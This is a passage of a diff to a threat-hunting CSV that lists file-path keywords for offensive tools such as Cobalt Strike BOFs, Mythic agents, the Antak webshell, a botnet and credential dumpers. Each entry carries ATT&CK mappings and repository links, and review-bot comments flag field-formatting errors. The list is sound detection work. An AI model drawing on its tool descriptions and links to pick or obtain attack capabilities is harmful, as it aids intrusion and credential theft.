TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/ANGRYPUPPY.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" -"*/antak.aspx*","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/antak.aspx*","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*/anthemtotheego/CredBandit*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*/AntiSandbox.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*/AntiSandbox.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" 
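Review bot: The re-added `*/antak.aspx*` row still carries `"T1583 T1595 T1190"` in `metadata_tool_techniques`, space-separated, where every other row in this hunk joins technique IDs with ` - `. A consumer that splits the field on that separator would read it as one unrecognised ID and drop the ATT&CK mapping for this webshell indicator. The same row has `metadata_tool_tactics` set to `N/A` even though techniques are listed. Since the line is already being rewritten for the star and fork counts, I would normalise it to `"T1583 - T1595 - T1190"` and fill the tactics column with the parent tactics of those techniques (`"TA0042 - TA0043 - TA0001"`, to be confirmed against the ATT&CK version the project tracks).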
@@ -2701,12 +2704,12 @@
 "*/apollon-main.zip*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z"
 "*/apollon-selective-x64*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z"
 "*/ApolloTest.exe","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
-"*/aquasecurity/cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
-"*/Ares.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z"
-"*/ares.py *","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z"
+"*/aquasecurity/cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
+"*/Ares.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z"
+"*/ares.py *","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z"
 "*/armitage.git*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z"
-"*/arp_scanner.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*/arp_spoof/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*/arp_scanner.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/arp_spoof/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
 "*/artifactor.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
 "*/ase_docker/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
 "*/asn-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
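Review bot: The re-added `*/arp_scanner.*` row still carries `T1204 -T1210` in metadata_tool_techniques, without the space before the second ID that the other entries in that field use, so a consumer that splits the field on ` - ` would get the single token `T1204 -T1210` and likely fail to map either technique; it should read `T1204 - T1210`. The re-added `*/arp_spoof/*` row lists `TA0010` both first and last in metadata_tool_tactics, which skews per-tactic coverage counts unless the consumer de-duplicates. Both rows are rewritten here only to refresh the star and fork counts, so normalising the two fields in the same pass would cost nothing.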
@@ -2716,65 +2719,65 @@ "*/ASRenum.cs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" "*/ASRenum-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" "*/ASREPRoast*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" -"*/asreproast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/asreproast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/assets/bin2uuids_file.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/assets/bin2uuids_file.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" "*/asyncssh_server.py*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control 
framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*/atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*/Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.Profiles.*.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.Profiles.*.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.Profiles.*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena.sln*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena/Assembly/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Athena/Commands/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/athena/mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/athena_utils/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AthenaPlugins/bin/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 